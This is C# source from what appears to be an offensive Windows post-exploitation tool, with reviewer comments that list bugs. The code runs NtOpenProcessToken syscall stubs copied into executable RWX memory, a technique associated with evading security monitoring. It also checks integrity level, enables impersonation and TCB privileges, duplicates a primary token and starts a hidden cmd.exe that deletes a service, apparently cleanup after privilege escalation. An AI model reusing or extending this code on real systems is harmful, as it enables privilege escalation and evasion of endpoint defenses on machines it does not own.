        /// <summary>
        /// Opens the access token of the process referred to by <paramref name="handle"/> by invoking an
        /// NtOpenProcessToken stub obtained from <paramref name="syscall"/> instead of the documented Win32 API.
        /// </summary>
        /// <param name="handle">Process handle whose token is to be opened.</param>
        /// <param name="access">Token access rights requested from the kernel.</param>
        /// <param name="currentToken">
        /// Receives whatever the stub left in the third argument slot. It is pre-seeded with IntPtr.Zero, so a
        /// stub that writes nothing yields IntPtr.Zero here.
        /// </param>
        /// <param name="syscall">Supplier of the stub bytes for the named system call.</param>
        /// <remarks>
        /// Review notes: the NTSTATUS captured in <c>returnValue</c> is never examined, so a caller cannot
        /// distinguish a failed open from a successful one; the ExecuteReadWrite region returned by VirtualAlloc
        /// is never released (one leaked RWX page per call); <c>baseAddr</c> is assigned and never used; and the
        /// VirtualAlloc result is not checked for IntPtr.Zero before Marshal.Copy writes into it.
        /// </remarks>
        public static void getProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SyscallManager syscall)
        {
            IntPtr baseAddr = IntPtr.Zero;

            // The stub bytes are copied into a freshly committed RWX region and then called through a delegate.
            byte[] shellcode       = syscall.getSyscallASM("NtOpenProcessToken");
            var    shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);

            Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
            var    syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
            IntPtr token           = IntPtr.Zero;
            // DynamicInvoke writes out-parameters back into this array, which is why arguments[2] is read below.
            var    arguments       = new object[] { handle, access, token };
            var    returnValue     = syscallDelegate.DynamicInvoke(arguments);

            // NOTE(review): returnValue (the NTSTATUS) is dropped here; a non-zero status should be surfaced to the caller.
            currentToken = (IntPtr)arguments[2];
        }
        // Code from https://www.pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
        /// <summary>
        /// Reports whether the current process runs at high (or higher) mandatory integrity level.
        /// </summary>
        /// <param name="syscall">Supplier of the NtOpenProcessToken stub bytes used to open the process token.</param>
        /// <returns>
        /// True when the integrity RID read from the token is at least SECURITY_MANDATORY_HIGH_RID; false when it is
        /// lower, when the token could not be opened, or when GetTokenInformation fails. Those failure cases are
        /// indistinguishable from a genuinely low-integrity result.
        /// </returns>
        /// <remarks>
        /// Review notes: <c>pId</c> actually holds a process handle, not a process id; <c>baseAddr</c> is unused;
        /// the RWX region allocated for the stub is never freed; and the 1000-byte buffer is a fixed guess rather
        /// than a size obtained from a first GetTokenInformation call.
        /// </remarks>
        public static bool IsHighIntegrity(SyscallManager syscall)
        {
            // Misnamed: this is the current process handle (used as the first NtOpenProcessToken argument), not a PID.
            IntPtr pId = (Process.GetCurrentProcess().Handle);

            IntPtr hToken = IntPtr.Zero;

            IntPtr baseAddr = IntPtr.Zero;

            // Same stub-in-RWX-page pattern as getProcessToken; the allocation is never released.
            byte[] shellcode       = syscall.getSyscallASM("NtOpenProcessToken");
            var    shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);

            Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
            var    syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
            IntPtr token           = IntPtr.Zero;
            var    arguments       = new object[] { pId, TokenAccessFlags.TOKEN_QUERY, token };
            var    returnValue     = syscallDelegate.DynamicInvoke(arguments);

            // Zero is STATUS_SUCCESS; any other status skips the query and falls through to "false" below.
            if ((int)returnValue == 0)
            {
                try
                {
                    hToken = (IntPtr)arguments[2];
                    // Fixed-size scratch buffer for TOKEN_MANDATORY_LABEL; freed in the inner finally.
                    IntPtr pb = Marshal.AllocCoTaskMem(1000);
                    try
                    {
                        uint cb = 1000;
                        if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
                        {
                            // First field of the returned structure is the SID pointer of the integrity label.
                            IntPtr pSid = Marshal.ReadIntPtr(pb);

                            // The integrity RID is the last sub-authority of that SID.
                            int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));

                            // NOTE(review): the conditional is redundant; the comparison itself is the bool.
                            return(dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID ? true : false);
                        }
                    }
                    finally
                    {
                        Marshal.FreeCoTaskMem(pb);
                    }
                }
                finally
                {
                    // hToken was assigned at the top of the try, so this always closes the opened token.
                    CloseHandle(hToken);
                }
            }

            // Reached on open failure, on GetTokenInformation failure, or if the status check above did not pass.
            return(false);
        }
        /// <summary>
        /// Enables a fixed set of privileges on the current process token, duplicates the current identity's token
        /// as a primary token, and launches a hidden cmd.exe with it, recording the token and the API that
        /// succeeded in <c>TokenManager</c>.
        /// </summary>
        /// <remarks>
        /// Review notes: the whole body is wrapped in <c>catch { }</c>, so every failure (including interop
        /// exceptions) is silently discarded and the caller gets no signal; the NTSTATUS from the
        /// NtOpenProcessToken stub is never checked before the token is passed to <c>enablePrivileges</c>;
        /// <c>newToken</c> is transferred to <c>TokenManager.Token</c> only on success and leaks when both
        /// CreateProcess* calls fail; <c>processInfo</c>'s process and thread handles are never closed; and the
        /// RWX stub allocation is never freed. Note that the token that is duplicated is the one from
        /// <c>WindowsIdentity.GetCurrent().Token</c>, not the one opened through the stub (that one is only
        /// used for the privilege adjustment and closed immediately afterwards).
        /// </remarks>
        public void Start()
        {
            SyscallManager syscall = new SyscallManager();


            try
            {
                IntPtr        token  = WindowsIdentity.GetCurrent().Token;
                List <string> aPrivs = new List <string>();

                // Privileges requested on the process token; enablePrivileges is defined elsewhere in the file.
                aPrivs.Add("SeImpersonatePrivilege");
                aPrivs.Add("SeTcbPrivilege");
                aPrivs.Add("SeAssignPrimaryTokenPrivilege");
                aPrivs.Add("SeIncreaseQuotaPrivilege");

                IntPtr currentToken;

                // Inline copy of getProcessToken's stub-in-RWX-page pattern; baseAddr is unused here as well.
                IntPtr baseAddr        = IntPtr.Zero;
                byte[] shellcode       = syscall.getSyscallASM("NtOpenProcessToken");
                var    shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
                Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
                var    syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
                IntPtr t           = IntPtr.Zero;
                var    arguments   = new object[] { Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, t };
                var    returnValue = syscallDelegate.DynamicInvoke(arguments);

                // NOTE(review): returnValue is not checked; on failure currentToken is the seeded IntPtr.Zero.
                currentToken = (IntPtr)arguments[2];
                enablePrivileges(currentToken, aPrivs);

                CloseHandle(currentToken);

                TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY |
                                               TokenAccessFlags.TOKEN_DUPLICATE | TokenAccessFlags.TOKEN_ADJUST_DEFAULT |
                                               TokenAccessFlags.TOKEN_ADJUST_SESSIONID;

                // Duplicate the identity token (not the stub-opened one) as a primary token; give up silently on failure.
                IntPtr newToken = IntPtr.Zero;
                if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
                {
                    return;
                }

                // 0x00000001 is STARTF_USESHOWWINDOW; together with wShowWindow = 0 (SW_HIDE) the child starts hidden.
                STARTUPINFO startupInfo = new STARTUPINFO();
                startupInfo.cb          = Marshal.SizeOf(startupInfo);
                startupInfo.lpDesktop   = "";
                startupInfo.wShowWindow = 0;
                startupInfo.dwFlags    |= 0x00000001;

                PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
                LogonFlags          l           = new LogonFlags();

                // Hard-coded command line. Method 1 = CreateProcessAsUserW succeeded; Method 2 = CreateProcessWithTokenW fallback.
                // NOTE(review): processInfo.hProcess / hThread are never closed on either path.
                if (CreateProcessAsUserW(newToken, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
                {
                    TokenManager.Token  = newToken;
                    TokenManager.Method = 1;
                }
                else
                {
                    if (CreateProcessWithTokenW(newToken, l, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
                    {
                        TokenManager.Token  = newToken;
                        TokenManager.Method = 2;
                    }
                    // NOTE(review): if this call also fails, newToken is neither stored nor closed.
                }
            }
            // NOTE(review): swallows every exception without logging, hiding interop and privilege failures from the caller.
            catch { }
        }